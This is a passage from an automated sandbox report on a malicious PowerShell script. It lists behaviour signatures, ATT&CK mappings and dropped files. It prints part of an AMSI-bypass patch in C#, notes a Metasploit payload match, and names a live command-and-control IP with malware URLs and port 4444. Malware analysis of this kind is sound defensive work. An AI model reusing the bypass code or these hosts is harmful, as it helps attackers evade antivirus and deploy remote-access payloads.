    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4024Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5867Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 708Thread sleep time: -11068046444225724s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep time: -1844674407370954s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Bypasses AMSI via dropped C# code
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.csJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Remote Access Functionality

    barindex
    Yara detected Metasploit Payload
    Source: Yara matchFile source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading    		11
    Process Injection    		1
    Disable or Modify Tools    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading    		21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media1
    Non-Standard Port    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive11
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Obfuscated Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture1
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets2
    File and Directory Discovery    		SSHKeylogging121
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Execute.ps133%VirustotalBrowse
    Execute.ps113%ReversingLabsWin32.Trojan.Generic

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://158.101.196.44/AVEvasion.dll100%Avira URL Cloudmalware
    https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUv0%Avira URL Cloudsafe
    http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK0%Avira URL Cloudsafe
    http://158.101.196.440%Avira URL Cloudsafe
    https://158.101.196.44/0%Avira URL Cloudsafe
    https://158.101.196.44:4444/0%Avira URL Cloudsafe
    https://158.101.196.44/)0%Avira URL Cloudsafe
    http://158.101.196.44/random.txt100%Avira URL Cloudmalware
    https://158.101.196.44:4444/g0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RKtrue
    • Avira URL Cloud: safe
    		unknown
    http://158.101.196.44/random.txttrue
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://158.101.196.44/AVEvasion.dllpowershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1false
    • Avira URL Cloud: malware
    		unknown
    http://158.101.196.44powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://158.101.196.44/powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUvpowershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129497000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://158.101.196.44:4444/powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://158.101.196.44:4444/gpowershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://158.101.196.44/)powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          158.101.196.44
                          		unknownUnited States
                          		31898ORACLE-BMC-31898UStrue

                          General Information

                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591975
                          Start date and time:2025-01-15 16:01:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Execute.ps1
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winPS1@6/12@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 91%
                          • Number of executed functions: 5
                          • Number of non-executed functions: 1
                          Cookbook Comments:
                          • Found application associated with file extension: .ps1

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          10:02:17API Interceptor584955x Sleep call for process: powershell.exe modified

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          ORACLE-BMC-31898USInvoice No 1122207 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          PDF6UU0CVUO2W-YGVUIO.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                          • 193.122.130.0
                          PO#_1100015533.scrGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                          • 193.122.130.0
                          1nl3hc.ps1Get hashmaliciousMassLogger RATBrowse
                          • 193.122.130.0
                          Contrarre.exeGet hashmaliciousMassLogger RATBrowse
                          • 193.122.6.168
                          Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 193.122.6.168
                          RFQ_AS0101402025.22025_PDF.exeGet hashmaliciousMassLogger RATBrowse
                          • 158.101.44.242
                          m68k.elfGet hashmaliciousUnknownBrowse
                          • 193.122.239.186
                          50201668.exeGet hashmaliciousMassLogger RATBrowse
                          • 193.122.130.0

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11608
                          Entropy (8bit):4.891267907306711
                          Encrypted:false
                          SSDEEP:192:x9smzdcU6Cj9dcU6C7Vsm5emdV9smbib4xYTVsm5emdqxoe5gpOWib4g2Ca6pZlM:XFfib4xYTfHib4nopbjvwRjdvRIikjhQ
                          MD5:5966004D80284773CCED7E826107C77F
                          SHA1:BCDB6F37234D2BEEDE3DB0D16DFBF47658FDDD3F
                          SHA-256:984F8EFEF1FF59DEF37228414F8CDADE33AE01123BC15D9800210CE59C307D90
                          SHA-512:C13EB96E4F98E41361C8E53C566E7E1B625DAD58F190746890B3595015E95A02213EEE3930565FECECA9900AA64A234B178ED7E31E0D29F971E19CCC3E391CB7
                          Malicious:false
                          Reputation:low
                          Preview:PSMODULECACHE......&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........p...z..[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                          C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                          Category:dropped
                          Size (bytes):1703
                          Entropy (8bit):4.758062771969888
                          Encrypted:false
                          SSDEEP:48:Jjh+l+o8ZIFhRDdi8zGehwsFwzvxIdX1pIpU1tdIOPC2b:Jjpo8ch17gZI1IutdIOpb
                          MD5:DAF9787822A1CD4A3102E005B0B5539C
                          SHA1:BFA3F7CD00F5348D5BAC305B4AD18B4FEE65A6BC
                          SHA-256:CF908E8C3464BB2889C7B16C2C2A03E4B3280638CF576DF7A081C5C65CF52D83
                          SHA-512:DB85BFACD06BDB00D9BDF95AAC18BEA0262344B5156B47EC409D482113C11BAABD4F8A1E183C00A2CB63D40948CC6AB5375B1A31A97C238B42F7B88A0C47FEC0
                          Malicious:true
                          Reputation:low
                          Preview:.using System;.using System.Runtime.InteropServices;..namespace BP.{. public class AMS. {. [DllImport("kernel32")]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);. [DllImport("kernel32")]. public static extern IntPtr LoadLibrary(string name);. [DllImport("kernel32")]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]. static extern void MoveMemory(IntPtr dest, IntPtr src, int size);... public static void Disable(). {. IntPtr AMSDLL = LoadLibrary("amsi.dll");. IntPtr AMSBPtr = GetProcAddress(AMSDLL, "Am" + "si" + "Scan" + "Buffer");. UIntPtr dwSize = (UIntPtr)5;. uint Zero = 0;. VirtualProtect(AMSBPtr, dwSize, 0x40, out Zero);. Byte[] Patch1 = { 0x31 };. B

                          C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                          Category:dropped
                          Size (bytes):371
                          Entropy (8bit):5.2650024927205195
                          Encrypted:false
                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23f9xo+Uzxs7+AEszICHhJ23f9xo8:p37Lvkmb6Ki1xo+UWZEv1xo8
                          MD5:174A2E39BA4603BD6C5D6C69EA4402D8
                          SHA1:2F1744CD46DAB235DD050789EB07DF2BDD436110
                          SHA-256:95C0EB2A095CA4304D9105A44CA87B688D1DB8FC439AB3AD13779C45E89EAD3C
                          SHA-512:9E927A41D5F16BB279CF45CA335A861E2C195D550F55797E81A5EAAB0931BEE77D2FC5B0B52B07E31B8460FBBFEF677133F504E08B782B7DFAD8A8F9C8679527
                          Malicious:true
                          Reputation:low
                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs"

                          C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3285327778117244
                          Encrypted:false
                          SSDEEP:48:6wwtzBidBcLC5eHhrJU0pkhKMDDzs1ulMa3Aq:itzcBiC5eJytPDaK
                          MD5:7AF68E3F729127AD73AA656F2108F93B
                          SHA1:C091BFA452F9F4DDD4D2ABDB903E2F12525BA41A
                          SHA-256:8E2AA5AD84B0BCC1EFCC06C14549C9F9B895C621F7F793E60881B5B73B9A1110
                          SHA-512:F5A091105D8CD2B1C45224ACF9D7D3D3B2B529C95F128F57F10EBF91BA5963E1AFF514828263F35DF6DA69F69D69C774CF4CA4CEB1ED6F030FF6684DE72430D5
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".g...........!.................&... ...@....... ....................................@.................................|&..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......@!..<............................................................0..........r...p(......r...p(......(..........@..(....&............1................ .................... ..........(............(.......(.......(.....(............(.......(.......(.....(............(.......(.......(....r1..p(....*..(....*BSJB............v4.0.30319......l.......#~..@.......#Strings....,...l...#US.........#GUID...........#Blob...........G.........%3........................................

                          C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.out

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):872
                          Entropy (8bit):5.327490263744411
                          Encrypted:false
                          SSDEEP:24:KOId3ka6Ki1+GEv1+pKax5DqBVKVrdFAMBJTH:xkka6L0GEv0pK2DcVKdBJj
                          MD5:4C92DCC0081DC3415D51627F3A47622E
                          SHA1:C84D4C08250C7F7FA138FA80B672EF6C29E96D24
                          SHA-256:974365FC11E8A0E41F78D5CE06781EE9329A46FD92ACC168C0A43F519BEC7964
                          SHA-512:9C1AC9CD762DF8EB7B9C7A93114C273AF620677E6CD3913641EDD83AE3E84E61C19FC915D5D0C8433D6835C4C634695252360384A1E9F3A27852DE21F550A986
                          Malicious:false
                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                          C:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          File Type:MSVC .res
                          Category:dropped
                          Size (bytes):652
                          Entropy (8bit):3.1056410157656775
                          Encrypted:false
                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKak7Ynqq4PN5Dlq5J:+RI+ycuZhNMakS4PNnqX
                          MD5:A2C7EEBFB1C3003E254EAEAD2BF06422
                          SHA1:90BEA2767E0681E7273AD36A126DAECDB0D0448B
                          SHA-256:4CB783AEC810CC66543B0E787731B747BC944BF8F7A856D667D2820B986CBC92
                          SHA-512:3E1E00EC4AB2EC848E62668F9C4ABF6E6CB7CFFB46322A5F80B15279ADDCE7CD404C3A39218AF53E835FEB9ED24D618132D422467AA4E5074BC0A57359DB3FCC
                          Malicious:false
                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.u.t.2.q.r.c.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.u.t.2.q.r.c.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                          C:\Users\user\AppData\Local\Temp\RES80CF.tmp

                          Download File
                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Jan 15 16:06:58 2025, 1st section name ".debug$S"
                          Category:dropped
                          Size (bytes):1332
                          Entropy (8bit):3.999721309651937
                          Encrypted:false
                          SSDEEP:24:H/FzW9nq1kTbHdawKRmNII+ycuZhNMakS4PNnqS2d:Mq2b9xKRmu1ulMa3AqSG
                          MD5:9F3DBE71D5C85244B38DC8026EA113D7
                          SHA1:6B5DEA6F9410E33750DDBEA2A45EFCB4705710DF
                          SHA-256:1967AD5CC093560480BD3377B455FACDB49275265F127F883B66197D575F8564
                          SHA-512:371B506B282DC7FE7EE43C5E4C73DA1000051E49955A56882EBF34E5E0328D10E9AFF92EA9C091BD9E6BC57BD96FC856EDF2215DC5C0E91BC6435D339ECF783E
                          Malicious:false
